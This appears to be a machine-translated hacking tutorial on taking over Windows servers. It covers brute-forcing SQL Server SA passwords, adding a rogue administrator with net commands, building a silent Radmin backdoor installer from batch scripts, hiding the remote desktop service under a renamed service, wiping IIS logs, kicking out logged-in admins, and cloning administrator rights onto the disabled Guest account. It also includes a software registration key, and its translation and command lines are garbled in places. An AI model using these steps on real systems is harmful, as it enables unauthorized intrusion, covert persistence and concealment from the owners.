Resolve intrusion 3389 of all processes _ security settings

This is a lot of my years of experience.

Tools: Winntautoattack Automatic attackers (sweep vulnerabilities); Sqltools (sa null password connector); Ramdin Shadow 3.0 Chinese Version (Remote Control program) (Radmin Registration code:

08us9a95i+lka9nbolxqv0v8xqddvkgcnctpn2wv11isqocvua
6a5kkzrhc5gvmiybwomk6rnwoj8myy8lxrfi23); SC.exe Port.bat Query.exe Quser.exe (hides 3389 services and does not allow management to discover its own program); CleanIISLog.exe (Banyan PP) 3389.exe (open 3389-port service); Psu.exe (used by a banned guest account); Mstsc.exe (Remote Desktop Connection Program).

A. Sweep to SA weak password (automatic attacker)

Two. Build a user with a sqltools connection


net start Telnet
Open Telnet Service
NET user Mint Mint/add
Add user mint Password to
Mint net localgroup Administrators Mint/add
Upgrade your account Mint to Administrator


Three. Upload Backdoor program RAD.EXE (radmin service-side self-extracting program)

Make RAD.EXE process:

1, to the Radmin installation directory to find AdmDll.dll, Raddrv.dll and R_sever.exe;

2, the local set up the server (must be generated);

Set Password-->> set connection port (default 4489)-->> build

3, the Export registry Hkey_local_machine\\system\\radmin key value of 1.reg;

4, the preparation of a batch processing, and named U.bat;


@echo Offnet Stop R_server



5, write the second batch processing, R.bat, the content is:


@echo Off@Explorer.exe/
Uninstall/silence@explorer.exe/install/
silence@regedit/s 1.reg@echo Off@explorer.exe/uninstall/
Silence@explorer.exe/install/silence@regedit/
S 1.reg@net start R_server@del
Rad.exe@del 1.reg@del R.bat@del U.bat


6, will AdmDLL.dll Raddrv.dll Explorer.exe (r_sever.exe renamed) U.bat R.bat compressed into Rad.rar compressed package;

7, the Rad.rar will be made into a self-extracting file;

Select Default.sfx Self release Module-->> advanced self release Option

-->> General

Release path:%SystemRoot%\\System32

Setup: Run after release: Run before R.bat release U.bat

-->> Touch Style

Silent mode: All hide overwrite: Overwrite all files

-->> determine-->> determine

Build completed.

Four. Connect with Radmin customer service end

Uploading Files to C:\\Winnt (XP is Windows):

Port.bat (if it's XP, this will change the Winnt inside to Windows)

Query.exe Quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

Psu.exe

It's best to upload a bounce back door radmin into Telnet.

Run C:\\winnt\\3389.exe and restart the broiler.

Five. Connect with Remote Desktop remote after reboot

Sometimes there is a problem.

Use 3389 Landing, find the landing user is full, do not be afraid, we kicked him out.

Telnet to the other IP, and the discovery requires NTLM authentication. We set up an account in our own computer mint password for Mint identity as administrator.

Find C:\\winnt\\system32\\cmd.exe build a shortcut to the desktop. Modify CMD shortcut properties to allow other identities to log in. Then run the Cmd.exe shortcut on the desktop. Enter account Mint password mint,telnet each other IP, can be directly landed on the other side of the computer.

To use the command:

C:\\query User (see the other side of the current terminal landing status.) )

To run the command:

C:\\logoff 1 (Kick out a manager)

Again with c:\\query user check a then ~ ~ (This is why not immediately use 1.bat)

Six. After the connection. Run under CMD

C:\\winnt\\log. Own IP. (Wipe pp)

C:\\winnet\\1.bat (delete overwrite view current online user file)

Seven. Play SA null password patch

Program-->>microsoft SQL server-->> Query Analyzer (with Magnifier)

-->>windowst Position Verification Login

Copy code: Selmis



if exists (SELECT * from dbo.sysobjects where ID
= object_id (n\ ' [dbo].[ Xp_cmdshell]\ ')
and OBJECTPROPERTY (ID, n\ ' isextendedproc\ ')
= 1 exec sp_dropextendedproc n\ ' [dbo]. [Xp_cmdshell]\ ' Go



Press F5 (run), close the exit SQL Server and then use SQL Server body bit authentication to enter once, exit (this is to leave no record).

Eight. Change 3389 port and service name

Modify the server-side port settings and the registry has 2 places to modify.

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal server\\wds\\rdpwd\\tds\\tcp],portnumber value, The default is 3389, select 10, modify to the desired port, such as 1314.

A second place:

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\winstations\\rdp-tcp] PortNumber value, the default is 3389, select 10, modify to the desired port, such as 1314.

To reboot the system to use the new port connection. (No hurry.) Change his service name and reboot the system.

Export the 3389 service's

[Hkey_local_machine\\system\\currentcontrolset\\services\\termservice]

The key value is the Mm.reg file. Edit the Mm.reg file and replace TermService with Alerter (Error warning service ...). Other services are OK). Then the tenth line of "Description" = "(Here is the service description, change to the service description you changed, here to notify the selected users and computers related to system management-level alerts.) "Line 11th" DisplayName "=" (here is the name of the service, change to the name of the service you changed, here to Alerter). Save, and then import the registry (here to run services.msc (you can play this command under CMD) Service Manager. Stop the Alerter service first.

Again under the CMD



CD c:\\winnt\\
System32 copy Termsrv.exe Service.exe
(Here is the copy Termsrv.exe for Alerter service file name similar file)
CD c:\\winnt sc \\\\127.0.0.1 config Alerter binpath=
C:\\winnt\\system32\\service.exe
(This is the new redirected Alerter service file.) Service name must be case-sensitive case a to capitalize





Nine. After the elimination (the direct clearance of the injection is better) use Radmin to restart the broiler

10. Use the disabled account [Guest] login, delete the account you started to build

1. Use Psu.exe to expand the registry to

Hkey_local_machine\\sam\\sam\\domains\\account\\users

Usage: [psu-p regedit-i PID]

The value of the PID is to right-click in the taskbar blank-->> Task Manager--->> process winlogon.exe The value behind is the PID value.

such as: Psu–p regedit–i 157

The method of Kechen the guest gram to administrator permissions:

The type value of the Hkey_local_machine\\sam\\sam\\domains\\account\\users\\names\\administrator is found.

This type value is found under Hkey_local_machine\\sam\\sam\\domains\\account\\users\\ to duplicate the value of the number named F, which covers the corresponding type values of the guest (the method is found).

Export the guest's configuration (that is, export the data for hkey_local_machine\\sam\\sam\\domains\\account\\users\\guest and his corresponding type value), and then delete the guest's configuration.

2. View the list of accounts in Computer Management, which can cause errors [unable to find an account] (skip this step).

3. Configure the guest's configuration (two reg files into the registry).

4. Modify the Guest account password and disable the Guest account at the command line [must be under the command line].


NET User Guest * * * *
[Modify password]net user Guest/
Active:yesnet User guest/active:no[Disable Guest under command line


5. The experiment is prohibited account guest is available.

6. After the guest login to delete their own built account.


NET user Mint/del


The whole process is over.


Finally, it is best to radmin service also changed, more to leave a back door many roads, hehe. The whole process is over, and the machine really becomes your broiler.